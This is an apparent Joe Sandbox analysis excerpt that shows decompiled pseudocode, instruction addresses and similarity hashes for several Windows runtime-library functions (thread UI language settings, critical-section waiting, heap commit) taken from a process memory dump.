																	_t122 = L00A938A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00A976E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00A976E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00ABFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00A970F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00ABFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00ABFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00ABFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00ABFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00ABFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xb77b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xb77b84 = _t75;
						_t73 = E00A9EB70(_t134, 0xb77b60);
						if( *0xb77b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00A9FF60( *0xb77b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                    0x00abfab0
                                                    0x00abfab2
                                                    0x00abfab3
                                                    0x00abfab4
                                                    0x00abfabc
                                                    0x00abfac0
                                                    0x00abfb14
                                                    0x00abfb17
                                                    0x00abfac2
                                                    0x00abfac8
                                                    0x00abfacd
                                                    0x00abfad3
                                                    0x00abfad3
                                                    0x00abfadd
                                                    0x00abfb18
                                                    0x00abfb1b
                                                    0x00abfb1d
                                                    0x00abfb1e
                                                    0x00abfb1f
                                                    0x00abfb20
                                                    0x00abfb21
                                                    0x00abfb22
                                                    0x00abfb23
                                                    0x00abfb24
                                                    0x00abfb25
                                                    0x00abfb26
                                                    0x00abfb27
                                                    0x00abfb28
                                                    0x00abfb29
                                                    0x00abfb2a
                                                    0x00abfb2b
                                                    0x00abfb2c
                                                    0x00abfb2d
                                                    0x00abfb2e
                                                    0x00abfb2f
                                                    0x00abfb3a
                                                    0x00abfb3b
                                                    0x00abfb3e
                                                    0x00abfb41
                                                    0x00abfb44
                                                    0x00abfb47
                                                    0x00abfb4a
                                                    0x00abfb4d
                                                    0x00abfb53
                                                    0x00afbdcb
                                                    0x00afbdcb
                                                    0x00abfb59
                                                    0x00abfb5b
                                                    0x00abfb5b
                                                    0x00abfb5e
                                                    0x00afbdd5
                                                    0x00afbdd8
                                                    0x00000000
                                                    0x00afbdda
                                                    0x00000000
                                                    0x00afbdda
                                                    0x00abfb64
                                                    0x00abfb64
                                                    0x00abfb64
                                                    0x00abfb67
                                                    0x00abfb6e
                                                    0x00abfb70
                                                    0x00abfb72
                                                    0x00000000
                                                    0x00abfb78
                                                    0x00abfb7a
                                                    0x00abfb7a
                                                    0x00abfb7d
                                                    0x00abfb80
                                                    0x00afbddf
                                                    0x00afbde1
                                                    0x00000000
                                                    0x00afbde3
                                                    0x00000000
                                                    0x00afbde3
                                                    0x00abfb86
                                                    0x00abfb86
                                                    0x00abfb86
                                                    0x00abfb8b
                                                    0x00abfb90
                                                    0x00abfb92
                                                    0x00abfb94
                                                    0x00abfb9a
                                                    0x00abfb9b
                                                    0x00abfba1
                                                    0x00afbde8
                                                    0x00afbdeb
                                                    0x00afbded
                                                    0x00afbeb5
                                                    0x00afbeb5
                                                    0x00afbebb
                                                    0x00afbebd
                                                    0x00afbec3
                                                    0x00afbed2
                                                    0x00afbedd
                                                    0x00afbedd
                                                    0x00afbeed
                                                    0x00000000
                                                    0x00afbdf3
                                                    0x00afbdfe
                                                    0x00afbe06
                                                    0x00afbe0b
                                                    0x00afbe0d
                                                    0x00afbe0f
                                                    0x00afbe14
                                                    0x00afbe19
                                                    0x00afbe20
                                                    0x00afbe25
                                                    0x00afbe27
                                                    0x00afbe35
                                                    0x00afbe39
                                                    0x00afbe46
                                                    0x00afbe4f
                                                    0x00afbe54
                                                    0x00afbe56
                                                    0x00afbef8
                                                    0x00afbef8
                                                    0x00000000
                                                    0x00afbe5c
                                                    0x00afbe5c
                                                    0x00afbe60
                                                    0x00000000
                                                    0x00afbe66
                                                    0x00afbe66
                                                    0x00afbe7f
                                                    0x00afbe84
                                                    0x00afbe87
                                                    0x00afbe89
                                                    0x00afbe8b
                                                    0x00afbe99
                                                    0x00afbe9d
                                                    0x00afbea0
                                                    0x00afbeac
                                                    0x00afbeaf
                                                    0x00afbeb1
                                                    0x00afbeb3
                                                    0x00afbeb3
                                                    0x00000000
                                                    0x00afbea2
                                                    0x00afbea2
                                                    0x00000000
                                                    0x00afbea2
                                                    0x00afbe8d
                                                    0x00afbe8d
                                                    0x00afbe92
                                                    0x00000000
                                                    0x00afbe92
                                                    0x00afbe8b
                                                    0x00afbe60
                                                    0x00afbe3b
                                                    0x00afbe3b
                                                    0x00afbe3e
                                                    0x00000000
                                                    0x00afbe40
                                                    0x00afbe40
                                                    0x00afbe44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00afbe44
                                                    0x00afbe3e
                                                    0x00afbe29
                                                    0x00afbe29
                                                    0x00000000
                                                    0x00afbe29
                                                    0x00afbe27
                                                    0x00000000
                                                    0x00abfba7
                                                    0x00abfba7
                                                    0x00abfbab
                                                    0x00afbf02
                                                    0x00abfbb1
                                                    0x00abfbb1
                                                    0x00abfbb8
                                                    0x00abfbbd
                                                    0x00abfbbd
                                                    0x00abfbbf
                                                    0x00abfbbf
                                                    0x00abfbc5
                                                    0x00abfbcb
                                                    0x00abfbf8
                                                    0x00abfbf8
                                                    0x00abfbfa
                                                    0x00000000
                                                    0x00abfc00
                                                    0x00abfc00
                                                    0x00abfc03
                                                    0x00000000
                                                    0x00abfc09
                                                    0x00abfc09
                                                    0x00abfc0f
                                                    0x00abfc15
                                                    0x00abfc23
                                                    0x00abfc23
                                                    0x00abfc25
                                                    0x00abfc27
                                                    0x00abfc75
                                                    0x00abfc7c
                                                    0x00abfc84
                                                    0x00000000
                                                    0x00abfc29
                                                    0x00abfc29
                                                    0x00abfc2d
                                                    0x00abfc30
                                                    0x00afbf0f
                                                    0x00000000
                                                    0x00abfc36
                                                    0x00abfc38
                                                    0x00abfc3b
                                                    0x00abfc41
                                                    0x00afbf17
                                                    0x00afbf19
                                                    0x00afbf48
                                                    0x00afbf4b
                                                    0x00000000
                                                    0x00afbf1b
                                                    0x00afbf22
                                                    0x00afbf24
                                                    0x00afbf26
                                                    0x00000000
                                                    0x00afbf2c
                                                    0x00afbf37
                                                    0x00afbf39
                                                    0x00afbf3b
                                                    0x00000000
                                                    0x00afbf41
                                                    0x00afbf41
                                                    0x00afbf41
                                                    0x00afbf41
                                                    0x00afbf45
                                                    0x00000000
                                                    0x00afbf45
                                                    0x00afbf3b
                                                    0x00afbf26
                                                    0x00000000
                                                    0x00abfc47
                                                    0x00abfc47
                                                    0x00abfc49
                                                    0x00abfcb2
                                                    0x00abfcb4
                                                    0x00abfcb6
                                                    0x00abfcdc
                                                    0x00abfcdc
                                                    0x00000000
                                                    0x00abfcb8
                                                    0x00abfcc3
                                                    0x00abfcc5
                                                    0x00abfcc7
                                                    0x00000000
                                                    0x00abfcc9
                                                    0x00abfcc9
                                                    0x00abfccd
                                                    0x00000000
                                                    0x00abfccd
                                                    0x00abfcc7
                                                    0x00000000
                                                    0x00abfc4b
                                                    0x00abfc4b
                                                    0x00abfc4e
                                                    0x00abfc4e
                                                    0x00abfc51
                                                    0x00abfc51
                                                    0x00abfc54
                                                    0x00abfc5a
                                                    0x00abfc5c
                                                    0x00abfc5f
                                                    0x00abfc61
                                                    0x00abfc63
                                                    0x00abfc65
                                                    0x00abfc67
                                                    0x00abfc6e
                                                    0x00abfc72
                                                    0x00abfc72
                                                    0x00abfc72
                                                    0x00abfc72
                                                    0x00abfc67
                                                    0x00abfc61
                                                    0x00000000
                                                    0x00abfc5a
                                                    0x00abfc49
                                                    0x00abfc41
                                                    0x00abfc30
                                                    0x00abfc27
                                                    0x00abfc03
                                                    0x00abfbcd
                                                    0x00abfbd3
                                                    0x00abfbd9
                                                    0x00abfbdc
                                                    0x00abfbde
                                                    0x00abfc99
                                                    0x00abfc9b
                                                    0x00abfc9d
                                                    0x00abfcd5
                                                    0x00abfcd5
                                                    0x00abfc89
                                                    0x00abfc89
                                                    0x00000000
                                                    0x00abfc9f
                                                    0x00abfc9f
                                                    0x00abfca3
                                                    0x00000000
                                                    0x00abfca3
                                                    0x00000000
                                                    0x00abfbe4
                                                    0x00abfbe4
                                                    0x00abfbe4
                                                    0x00abfbe4
                                                    0x00abfbe9
                                                    0x00abfbf2
                                                    0x00000000
                                                    0x00abfbf2
                                                    0x00abfbde
                                                    0x00abfbcb
                                                    0x00abfbab
                                                    0x00abfc8b
                                                    0x00abfc8b
                                                    0x00abfc8c
                                                    0x00abfb80
                                                    0x00abfb72
                                                    0x00abfb5e
                                                    0x00abfc8d
                                                    0x00abfc91
                                                    0x00abfadf
                                                    0x00abfadf
                                                    0x00abfae1
                                                    0x00abfae4
                                                    0x00abfae7
                                                    0x00abfaec
                                                    0x00abfaf8
                                                    0x00abfb00
                                                    0x00abfb07
                                                    0x00abfb0f
                                                    0x00abfb0f
                                                    0x00abfb07
                                                    0x00000000
                                                    0x00abfaf8
                                                    0x00abfadd

                                                    Strings
                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00AFBE0F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                    • API String ID: 0-865735534
                                                    • Opcode ID: 22b66bfa50430e6044b04a3723b4642dcfd42bf1699ac3ebd13941c786a4a818
                                                    • Instruction ID: 07a1eca9263f7aa2ce840c83c86832463d0e07b1769d8b0eb03f50d1e0187a0c
                                                    • Opcode Fuzzy Hash: 22b66bfa50430e6044b04a3723b4642dcfd42bf1699ac3ebd13941c786a4a818
                                                    • Instruction Fuzzy Hash: DAA10471B10609CFDB25DBA8C8507FABBB8AF49710F184579F906DB692DB30DC818B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A82D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 63%
                                                    			E00A82D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xb75350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xb77bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00AC97C0();
				}
				if( *0xb779c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xb779c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00AB1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00AA7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00B1FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00AC9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00ABE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00ADDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xb76901;
								_push(_t109);
								_v52 = _t98;
								if( *0xb76901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00AC9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00AC95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00AA7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00AA7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00B07016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00B1FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xb75350;
							if(_t109 != 0xb75350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00B1FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E00B15720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                    0x00a82d8a
                                                    0x00a82d8a
                                                    0x00a82d92
                                                    0x00a82d96
                                                    0x00a82d9e
                                                    0x00a82da0
                                                    0x00a82da3
                                                    0x00a82da5
                                                    0x00a82da8
                                                    0x00a82dab
                                                    0x00a82db2
                                                    0x00adf9aa
                                                    0x00adf9ab
                                                    0x00adf9ae
                                                    0x00adf9ae
                                                    0x00a82db8
                                                    0x00a82dc2
                                                    0x00adf9b9
                                                    0x00adf9be
                                                    0x00adf9bf
                                                    0x00adf9bf
                                                    0x00a82dcf
                                                    0x00adf9c9
                                                    0x00a82dd5
                                                    0x00a82dd5
                                                    0x00a82dd5
                                                    0x00a82dde
                                                    0x00a82de1
                                                    0x00a82e70
                                                    0x00a82e72
                                                    0x00a82e72
                                                    0x00a82de7
                                                    0x00a82deb
                                                    0x00a82e7c
                                                    0x00a82e83
                                                    0x00a82e85
                                                    0x00a82e8b
                                                    0x00a82e8d
                                                    0x00a82e92
                                                    0x00a82e92
                                                    0x00a82e85
                                                    0x00a82df1
                                                    0x00a82df7
                                                    0x00a82df9
                                                    0x00a82df9
                                                    0x00a82dfc
                                                    0x00a82dff
                                                    0x00a82e02
                                                    0x00000000
                                                    0x00a82e05
                                                    0x00a82e0c
                                                    0x00adf9d9
                                                    0x00a82e12
                                                    0x00a82e12
                                                    0x00a82e12
                                                    0x00a82e1a
                                                    0x00adf9e3
                                                    0x00adf9e9
                                                    0x00adf9f0
                                                    0x00adf9f6
                                                    0x00adf9f8
                                                    0x00adf9f8
                                                    0x00adf9f0
                                                    0x00a82e23
                                                    0x00adfa02
                                                    0x00adfa03
                                                    0x00adfa05
                                                    0x00adfa06
                                                    0x00000000
                                                    0x00a82e29
                                                    0x00a82e29
                                                    0x00a82e2e
                                                    0x00a82e34
                                                    0x00a82e3e
                                                    0x00000000
                                                    0x00000000
                                                    0x00a82e44
                                                    0x00a82e47
                                                    0x00a82e4d
                                                    0x00000000
                                                    0x00000000
                                                    0x00a82e4f
                                                    0x00a82e54
                                                    0x00000000
                                                    0x00000000
                                                    0x00a82e5a
                                                    0x00a82e5f
                                                    0x00a82e9a
                                                    0x00a82ea4
                                                    0x00a82ea5
                                                    0x00a82ea8
                                                    0x00a82eaf
                                                    0x00a82eb2
                                                    0x00a82eb5
                                                    0x00adfae9
                                                    0x00adfaeb
                                                    0x00adfaed
                                                    0x00adfaef
                                                    0x00adfaf7
                                                    0x00adfaf8
                                                    0x00adfafd
                                                    0x00adfaff
                                                    0x00adfb04
                                                    0x00adfb04
                                                    0x00adfaff
                                                    0x00a82ec0
                                                    0x00a82ec4
                                                    0x00a82ec6
                                                    0x00a82ec8
                                                    0x00adfb14
                                                    0x00adfb18
                                                    0x00adfb1e
                                                    0x00adfb21
                                                    0x00adfb21
                                                    0x00a82ece
                                                    0x00a82ece
                                                    0x00a82ece
                                                    0x00a82ed7
                                                    0x00a82e61
                                                    0x00a82e63
                                                    0x00adfa6b
                                                    0x00adfa71
                                                    0x00adfa76
                                                    0x00adfa78
                                                    0x00adfa8a
                                                    0x00adfa7a
                                                    0x00adfa83
                                                    0x00adfa83
                                                    0x00adfa8f
                                                    0x00adfa91
                                                    0x00adfa97
                                                    0x00adfa9d
                                                    0x00adfaa4
                                                    0x00adfaaa
                                                    0x00adfaaf
                                                    0x00adfab1
                                                    0x00adfac3
                                                    0x00adfab3
                                                    0x00adfabc
                                                    0x00adfabc
                                                    0x00adfac8
                                                    0x00adfacb
                                                    0x00adfadf
                                                    0x00adfadf
                                                    0x00adfacb
                                                    0x00adfaa4
                                                    0x00adfa91
                                                    0x00a82e6f
                                                    0x00a82e6f
                                                    0x00a82e5f
                                                    0x00adfa13
                                                    0x00adfa15
                                                    0x00adfa17
                                                    0x00adfa1f
                                                    0x00adfa21
                                                    0x00adfa22
                                                    0x00adfa25
                                                    0x00adfa28
                                                    0x00adfa2f
                                                    0x00adfa2f
                                                    0x00adfa2a
                                                    0x00adfa2a
                                                    0x00adfa2a
                                                    0x00adfa31
                                                    0x00adfa34
                                                    0x00adfa36
                                                    0x00adfa3c
                                                    0x00adfa3e
                                                    0x00adfa41
                                                    0x00adfa43
                                                    0x00adfa45
                                                    0x00adfa45
                                                    0x00adfa41
                                                    0x00adfa3c
                                                    0x00adfa4a
                                                    0x00adfa4f
                                                    0x00adfa51
                                                    0x00adfa53
                                                    0x00adfa56
                                                    0x00adfa5b
                                                    0x00adfa5e
                                                    0x00000000
                                                    0x00adfa5e
                                                    0x00a82e23

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Re-Waiting
                                                    • API String ID: 0-316354757
                                                    • Opcode ID: 062e4d6934eb7fd665745a91dff37c6ea604a9cdc2452ac01a7158f9ac7248bc
                                                    • Instruction ID: 3fb9095af6864cb658ef1cd15c1a2423e19f95bdaeec781197f025081e123036
                                                    • Opcode Fuzzy Hash: 062e4d6934eb7fd665745a91dff37c6ea604a9cdc2452ac01a7158f9ac7248bc
                                                    • Instruction Fuzzy Hash: 76610131A00644AFDB21EB68C884B7FBBF5EB44754F2446AAE8179B3D1CB349D41C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B50EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E00B50EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E00B4FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00B51074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00AC9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00B4A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00B4A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xb78b04 >> 0x14) + (_v44 -  *0xb78b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00AA7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00B4138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00AA7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00B3FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xb78724 & 0x00000008) != 0) {
						E00B452F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00B515B5(0xb78ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                    0x00b50eb7
                                                    0x00b50eb9
                                                    0x00b50ec0
                                                    0x00b50ec2
                                                    0x00b50ecd
                                                    0x00b5105b
                                                    0x00b5105b
                                                    0x00b51061
                                                    0x00b51066
                                                    0x00b51066
                                                    0x00b5106b
                                                    0x00b51073
                                                    0x00b51073
                                                    0x00b50ed3
                                                    0x00b50ed6
                                                    0x00b50edc
                                                    0x00b50ee0
                                                    0x00b50ee7
                                                    0x00b50ef0
                                                    0x00b50ef5
                                                    0x00b50efa
                                                    0x00b50efc
                                                    0x00b50efd
                                                    0x00b50f03
                                                    0x00b50f04
                                                    0x00b50f06
                                                    0x00b50f07
                                                    0x00b50f09
                                                    0x00b50f0e
                                                    0x00b50f14
                                                    0x00b50f23
                                                    0x00b50f2d
                                                    0x00b50f34
                                                    0x00b50f34
                                                    0x00b50f14
                                                    0x00b50f52
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50f58
                                                    0x00b50f73
                                                    0x00b50f74
                                                    0x00b50f79
                                                    0x00b50f7d
                                                    0x00b50f80
                                                    0x00b50f86
                                                    0x00b50fab
